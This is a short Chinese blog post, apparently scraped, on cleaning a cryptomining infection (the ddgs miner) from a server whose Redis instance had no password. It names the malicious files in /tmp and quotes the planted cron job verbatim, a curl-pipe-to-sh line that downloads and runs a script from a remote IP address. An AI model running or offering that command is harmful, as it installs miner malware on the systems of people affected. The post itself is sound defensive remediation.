網站在運行期間感受怪怪的,響應速度慢的不是一丁半點,帶寬5M,不應是這樣的呀redis
因而登陸Xshellshell
top命令
查看cpu狀況以下curl
PID爲3435的進程佔用CPU過大,難道被病毒入侵了嗎?網站
查看該進程文件的絕對路徑url
cd /proc/3435
發現上述紅框文件,因而上網搜索了下,得治是挖礦病毒spa
處理辦法code
一、刪除tmp目錄裏的qW3xT.2和ddgs.3013文件。blog
二、刪除定時任務crontab -l 查看是否有異常*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(與計劃任務相同) crontab -e 進入編輯 刪除異常任務。進程
三、進入var/spool/cron目錄,文件打開root文件查看是否有異常,刪除異常,再進crontabs文件裏對root文件進行查看編輯,刪除異常定時任務並保存。crontab
防止再次侵入病毒解決辦法
解決redis入口問題,由於最開始沒有設置密碼,因此首先修改redis.conf。設置密碼,而後重啓redis
到此也就解決了刪除了挖礦病毒問題。
感謝你們瀏覽到此處~~~~